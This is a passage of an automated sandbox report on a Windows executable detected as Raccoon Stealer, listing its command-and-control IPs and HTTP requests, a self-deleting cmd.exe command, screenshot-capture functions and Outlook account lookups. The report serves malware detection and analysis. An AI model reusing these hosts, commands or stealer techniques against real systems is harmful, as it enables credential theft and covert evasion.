Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: KqxsoH2Rhn.exe, 00000001.00000003.376906908.000000004DC8D000.00000004.00000010.sdmp String found in binary or memory: http://194.180.174.182/
Source: KqxsoH2Rhn.exe, 00000001.00000003.376906908.000000004DC8D000.00000004.00000010.sdmp String found in binary or memory: http://194.180.174.182/2
Source: KqxsoH2Rhn.exe, 00000001.00000003.376906908.000000004DC8D000.00000004.00000010.sdmp String found in binary or memory: http://194.180.174.182/Square150x150.pngY
Source: KqxsoH2Rhn.exe, 00000001.00000003.376906908.000000004DC8D000.00000004.00000010.sdmp String found in binary or memory: http://194.180.174.182/l
Source: softokn3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: softokn3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: nssckbi.dll.1.dr String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: nssckbi.dll.1.dr String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: nssckbi.dll.1.dr String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: nssckbi.dll.1.dr String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: nssckbi.dll.1.dr String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: nssckbi.dll.1.dr String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: nssckbi.dll.1.dr String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: nssckbi.dll.1.dr String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
Source: nssckbi.dll.1.dr String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: nssckbi.dll.1.dr String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: nssckbi.dll.1.dr String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: softokn3.dll.1.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: nssckbi.dll.1.dr String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: softokn3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: softokn3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: softokn3.dll.1.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: softokn3.dll.1.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: nssckbi.dll.1.dr String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: nssckbi.dll.1.dr String found in binary or memory: http://ocsp.accv.es0
Source: softokn3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: softokn3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: softokn3.dll.1.dr String found in binary or memory: http://ocsp.thawte.com0
Source: nssckbi.dll.1.dr String found in binary or memory: http://policy.camerfirma.com0
Source: nssckbi.dll.1.dr String found in binary or memory: http://repository.swisssign.com/0
Source: softokn3.dll.1.dr String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: softokn3.dll.1.dr String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: softokn3.dll.1.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.accv.es00
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.cert.fnmt.es/dpcs/0
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.chambersign.org1
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: mozglue.dll.1.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: softokn3.dll.1.dr String found in binary or memory: http://www.mozilla.com0
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.quovadis.bm0
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: sqlite3.dll.1.dr String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: KqxsoH2Rhn.exe, 00000001.00000003.323980805.000000004DC11000.00000004.00000010.sdmp, 1xVPfvJcrg.1.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: KqxsoH2Rhn.exe, 00000001.00000003.323980805.000000004DC11000.00000004.00000010.sdmp, 1xVPfvJcrg.1.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: KqxsoH2Rhn.exe, 00000001.00000003.323980805.000000004DC11000.00000004.00000010.sdmp, 1xVPfvJcrg.1.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: KqxsoH2Rhn.exe, 00000001.00000003.323980805.000000004DC11000.00000004.00000010.sdmp, 1xVPfvJcrg.1.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: KqxsoH2Rhn.exe, 00000001.00000003.323980805.000000004DC11000.00000004.00000010.sdmp, 1xVPfvJcrg.1.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: nssckbi.dll.1.dr String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: nssckbi.dll.1.dr String found in binary or memory: https://repository.luxtrust.lu0
Source: KqxsoH2Rhn.exe, 00000001.00000003.323980805.000000004DC11000.00000004.00000010.sdmp, 1xVPfvJcrg.1.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: KqxsoH2Rhn.exe, 00000001.00000003.323980805.000000004DC11000.00000004.00000010.sdmp, 1xVPfvJcrg.1.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: KqxsoH2Rhn.exe, 00000001.00000003.326081764.000000004DC01000.00000004.00000010.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: KqxsoH2Rhn.exe, 00000001.00000003.326081764.000000004DC01000.00000004.00000010.sdmp String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: nssckbi.dll.1.dr String found in binary or memory: https://www.catcert.net/verarrel
Source: nssckbi.dll.1.dr String found in binary or memory: https://www.catcert.net/verarrel05
Source: softokn3.dll.1.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: KqxsoH2Rhn.exe, 00000001.00000003.323980805.000000004DC11000.00000004.00000010.sdmp, 1xVPfvJcrg.1.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 194.180.174.182
Source: global traffic HTTP traffic detected: GET /rino115sipsip HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: 185.163.47.176
Source: global traffic HTTP traffic detected: GET //l/f/qaHR_HwB3dP17SpzJnqt/e2fece3ec028ffea81a6e29ab137c790945d5c2c HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.182
Source: global traffic HTTP traffic detected: GET //l/f/qaHR_HwB3dP17SpzJnqt/553beaf07e7bcfa31cdc14361c20d4ecff5638ed HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.182

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to record screenshots
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_00429913 __EH_prolog,GdiplusStartup,GetDesktopWindow,GetWindowRect,GetWindowDC,GetDeviceCaps,CreateCompatibleDC,CreateDIBSection,DeleteDC,DeleteDC,DeleteDC,SaveDC,SelectObject,BitBlt,RestoreDC,DeleteDC,DeleteDC,DeleteDC,GdipAlloc,GdipCreateBitmapFromHBITMAP,_mbstowcs,GdipSaveImageToFile,DeleteObject,GdiplusShutdown, 1_2_00429913

E-Banking Fraud:

Yara detected Raccoon Stealer
Source: Yara match File source: 1.2.KqxsoH2Rhn.exe.47a0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.KqxsoH2Rhn.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.KqxsoH2Rhn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.KqxsoH2Rhn.exe.48b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.KqxsoH2Rhn.exe.48b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.KqxsoH2Rhn.exe.47a0e50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.378040707.00000000047A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.377370731.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.283534842.00000000048B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: KqxsoH2Rhn.exe PID: 6984, type: MEMORYSTR

System Summary:

Uses 32bit PE files
Source: KqxsoH2Rhn.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Detected potential crypto function
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_004362A1 1_2_004362A1
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_004103F7 1_2_004103F7
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0041E6DA 1_2_0041E6DA
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0040E727 1_2_0040E727
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_00410AD2 1_2_00410AD2
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_00434CB5 1_2_00434CB5
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0043CD97 1_2_0043CD97
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0041D364 1_2_0041D364
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0040D560 1_2_0040D560
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0040F78B 1_2_0040F78B
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_00415816 1_2_00415816
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_00427AAA 1_2_00427AAA
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_00429B40 1_2_00429B40
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0040DC7B 1_2_0040DC7B
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0041DD0B 1_2_0041DD0B
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_00435E43 1_2_00435E43
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0044C1E6 1_2_0044C1E6
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0043C20A 1_2_0043C20A
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0041C217 1_2_0041C217
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0042035B 1_2_0042035B
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0044C443 1_2_0044C443
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_004185E7 1_2_004185E7
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0042862C 1_2_0042862C
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_00486870 1_2_00486870
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: String function: 00466770 appears 100 times
PE file does not import any functions
Source: api-ms-win-core-handle-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-multibyte-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-private-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: KqxsoH2Rhn.exe, 00000001.00000003.370376940.000000004DC97000.00000004.00000010.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs KqxsoH2Rhn.exe
Source: KqxsoH2Rhn.exe, 00000001.00000002.378944844.000000006EC1B000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamenss3.dll8 vs KqxsoH2Rhn.exe
Source: KqxsoH2Rhn.exe, 00000001.00000002.379036521.000000006FB12000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamemozglue.dll8 vs KqxsoH2Rhn.exe
PE file contains more sections than normal
Source: sqlite3.dll.1.dr Static PE information: Number of sections : 18 > 10
Source: KqxsoH2Rhn.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: KqxsoH2Rhn.exe Virustotal: Detection: 35%
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\KqxsoH2Rhn.exe "C:\Users\user\Desktop\KqxsoH2Rhn.exe"
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\KqxsoH2Rhn.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@6/69@0/4
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_004279D5 CoCreateInstance,StrStrIW,CoTaskMemFree,CoTaskMemFree, 1_2_004279D5
Source: softokn3.dll.1.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: KqxsoH2Rhn.exe, 00000001.00000002.378846446.000000006EBE0000.00000002.00020000.sdmp, sqlite3.dll.1.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: softokn3.dll.1.dr Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: KqxsoH2Rhn.exe, 00000001.00000002.378846446.000000006EBE0000.00000002.00020000.sdmp, sqlite3.dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: KqxsoH2Rhn.exe, 00000001.00000002.378846446.000000006EBE0000.00000002.00020000.sdmp, nss3.dll.1.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);<
Source: KqxsoH2Rhn.exe, 00000001.00000002.378846446.000000006EBE0000.00000002.00020000.sdmp, sqlite3.dll.1.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: KqxsoH2Rhn.exe, 00000001.00000002.378846446.000000006EBE0000.00000002.00020000.sdmp, sqlite3.dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.1.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.1.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.1.dr Binary or memory string: SELECT ALL id FROM %s;
Source: softokn3.dll.1.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: sqlite3.dll.1.dr Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.1.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: KqxsoH2Rhn.exe, 00000001.00000002.378846446.000000006EBE0000.00000002.00020000.sdmp, nss3.dll.1.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: KqxsoH2Rhn.exe, 00000001.00000002.378846446.000000006EBE0000.00000002.00020000.sdmp, nss3.dll.1.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: KqxsoH2Rhn.exe, 00000001.00000002.378846446.000000006EBE0000.00000002.00020000.sdmp, sqlite3.dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: KqxsoH2Rhn.exe, 00000001.00000002.378846446.000000006EBE0000.00000002.00020000.sdmp, nss3.dll.1.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
Source: KqxsoH2Rhn.exe, 00000001.00000002.378846446.000000006EBE0000.00000002.00020000.sdmp, nss3.dll.1.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.1.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: KqxsoH2Rhn.exe, 00000001.00000002.378846446.000000006EBE0000.00000002.00020000.sdmp, nss3.dll.1.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
Source: sqlite3.dll.1.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: KqxsoH2Rhn.exe Joe Sandbox Cloud Basic: Detection: clean Score: 0
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6880:120:WilError_01
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Mutant created: \Sessions\1\BaseNamedObjects\useriZ5i-O1fR-8gT0
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Command line argument: NaF 1_2_004660A0
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: KqxsoH2Rhn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: KqxsoH2Rhn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: KqxsoH2Rhn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: KqxsoH2Rhn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: KqxsoH2Rhn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: KqxsoH2Rhn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: KqxsoH2Rhn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.1.dr
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.1.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: KqxsoH2Rhn.exe, 00000001.00000002.378846446.000000006EBE0000.00000002.00020000.sdmp, nss3.dll.1.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.1.dr
Source: Binary string: ucrtbase.pdb source: ucrtbase.dll.1.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: KqxsoH2Rhn.exe, 00000001.00000003.370376940.000000004DC97000.00000004.00000010.sdmp, api-ms-win-core-memory-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.1.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.1.dr
Source: Binary string: C:\zihiwimugugi93\ragos 20\kusawuv\15.pdb source: KqxsoH2Rhn.exe
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.1.dr
